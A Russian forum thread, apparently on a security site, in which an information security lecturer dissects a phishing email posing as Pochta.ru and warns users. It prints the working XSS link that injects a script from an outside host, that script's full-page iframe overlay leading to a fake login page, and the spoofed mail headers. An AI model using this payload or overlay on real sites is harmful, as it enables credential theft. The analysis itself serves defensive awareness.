-
Высококачественный фишинг "от Почта.ру"
Некоторые участники, вероятно, знают о том, что я владею несколькими небольшими сайтами на бесплатном хостинге "Новая Почта", который определенное время назад был передан во владение ресурсу "Почта.ру" (pochta.ru). Один из них - сайт бесплатного программного обеспечения.
Сегодня утром мне было доставлено письмо, пришедшее на почтовый адрес вышеупомянутого сайта.
От: Администрация Почта.ру [
[email protected]]
Кому: freeware
newmail.ru
Тема: Внимание! Ваш сайт запрещен к индексации
Тело письма пришло в искаженной кодировке (что настораживает), поэтому я не могу его процитировать. Вероятно, для корректного чтения его нужно отобразить в виде HTML, чего я делать не собираюсь. С содержимым письма я ознакомился через мобильный браузер, где HTML можно не опасаться; в письме говорилось, что ввиду значительного количества недоброкачественных сайтов поисковые машины Интернета блокировали индексацию сайтов на хостинге Почта.ру, и желающие должны вручную заполнить на сайте компании заявление на возобновление индексации. Ниже приведена ссылка, которая в HTML выглядит как
Код:
http://www.nm.ru/users...
Настоящее содержимое ссылки выглядит так:
Код:
http://www.nm.ru/users/reg.dhtml?__post=1&login=%EF%E0%EC%20%EF%E0%EC%20%EF%E0%ECa%5C%22%3E%3Cscript%20src=%22http://fansipanadventure.net/q.js%22%3E%3C/script%3E
Если ссылка сработает так, как задумал автор, то на исполнение будет запущен файл fansipanadventure.net/q.js.
Я давно не практикую как лечащий консультант регулярно, но время от времени мне интересно вспомнить некоторые старые навыки, и я отправился изучать данный файл.
Файл состоит из пары-тройки строк:
Код:
document.write("<div style='position: absolute; left: 0px; top: 0px; width:100%; height:100%; z-index:15; background-color:white' scrolling=no><iframe src='http://www.dprd-jayapurakota.go.id/files/index.htm' style='width:100%; height:100%;border-color=white;border:none;' border=0></frame></div>")
Кроме тэгов оформления, в нем есть только любимый всеми нами iframe, отправляющий нас к файлу
Код:
dprd-jayapurakota.go.id/files/index.htm
Этот файл, в свою очередь, представляет собой поддельную заглавную страницу Pochta.ru. Она в два раза короче настоящей (18 кб против 32 кб), так что разница очевидна. В блоке для ввода имени и пароля написано:
Произошла потеря сеанса. Для продолжения работы
необходимо войти в систему.
Все ссылки на странице, включая ссылку для восстановления пароля, абсолютные, т.е. ведут на настоящий сайт Pochta.ru. В самом блоке для имени и пароля ссылка для передачи данных относительная - login.php (то есть, видимо, dprd-jayapurakota.go.id/files/login.php), но уже этот файл не дает мне себя скачать.
Факт фишинга, думаю, очевиден. Соответственно, предупреждаю всех клиентов Pochta.ru: если вы получили такое письмо, ни при каких обстоятельствах не переходите по ссылке и не вводите свои учетные данные.
Почему же я, собственно, назвал фишинг высококачественным?
Меня приятно порадовала тщательность заполнения имени и адреса отправителя, которые создают ощущение подлинности письма. Пока я не увидел текст письма, я даже верил, что это письмо действительно от Почта.ру. Кроме того, злоумышленник озаботился знанием факта, что клиентам хостинга "Новая Почта" письма должны приходить от администрации Почта.ру, а ссылка должна указывать на сайт Новой Почты (правда, он как раз устаревший - видимо, настоящая Почта.ру не позволяла подобного трюка с внедрением скрипта).
Помимо этого, злоумышленник пошел еще дальше в создании иллюзии подлинности - он озаботился также наличием соответствующих данных в технических сведениях об отправителе, отослав свое письмо через почтовик Pochta.ru:
Received: from mx1.ks.pochta.ru(mx1.ks.pochta.ru [82.204.219.160])
by node6.ks.pochta.ru with POCHTA.RU LMTP SERVER
Так что техническая сторона фишинговой рассылки выполнена тщательно и скрупулезно. Возможно, этой рассылке даже удастся кого-нибудь обмануть.
[I]Nick Golovko
NCFU lecturer, information security specialist[/I]
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Сообщение от
NickGolovko
В самом блоке для имени и пароля ссылка для передачи данных относительная - login.php (то есть, видимо, dprd-jayapurakota.go.id/files/login.php), но уже этот файл не дает мне себя скачать.
А смысл давать себя скачать? Простенький скрипт, который только принимает логин-пароль и ничего не отдаёт наружу.
-
Да, сделано умно и уверенно. Я б наверно купился. Мне кажется есть смысл отправить ссылку в ЛК
-
-
вся фишка заключается лишь в кривых руках админов этого сервиса (нм) - посмотрите на скрипт в ссылке - это же лол просто.
затем фишка в гет-запросе.